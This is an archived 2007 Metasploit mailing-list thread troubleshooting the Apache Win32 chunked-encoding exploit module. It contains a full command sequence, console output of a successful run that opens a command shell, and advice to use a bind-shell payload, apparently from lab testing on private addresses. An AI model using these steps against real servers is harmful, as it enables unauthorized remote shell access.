Metasploit mailing list archives

Problem with Apache Win32 Chunked Encoding


From: grutz at jingojango.net (Kurt Grutzmacher)
Date: Thu, 1 Nov 2007 13:57:43 -0600

Your PAYLOAD won't work with CMD=calc.exe.  You're exploiting a service
that doesn't have a GUI component attached and so you won't get a
response back when you fire the exploit at it.

Use a different PAYLOAD like windows/shell/bind_tcp instead.

On Thu, Nov 01, 2007 at 09:18:26AM +0100, bluefoxy wrote:
Thank you Patrick, I tried setting VHOST, but it is not working.
I tried both in VMware and on a real network, some error.

My command list is below. Apache is at 192.168.1.80, Metasploit at 192.168.1.30:

use windows/http/apache_chunked
set RHOST 192.168.1.80
set LHOST 192.168.1.30
set VHOST 192.168.1.80
set TARGET 4
set CMD calc.exe
set PAYLOAD windows/exec
exploit

Can you list your commands?
Thanks.

bluefoxy



Patrick Webster wrote:
Are you sending traffic via a transparent proxy? You may need to set VHOST 
to get past it.

Works ok here - though a different target.

msf exploit(apache_chunked) > rcheck
[*] Serer is probably not vulnerable:
[*] The target is not exploitable.
msf exploit(apache_chunked) > rexploit
[*] Started reverse handler
[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/6 ]
[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/2 ]
[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/0 ]
[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/4 ]
[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/1 ]
[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/3 ]
[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/5 ]
[*] Command shell session 1 opened (192.168.146.12:4444 -> 192.168.146.13:1050)

-Patrick


-- 
                 ..:[ grutz at jingojango dot net ]:..
     GPG fingerprint: 5FD6 A27D 63DB 3319 140F  B3FB EC95 2A03 8CB3 ECB4
        "There's just no amusing way to say, 'I have a CISSP'."


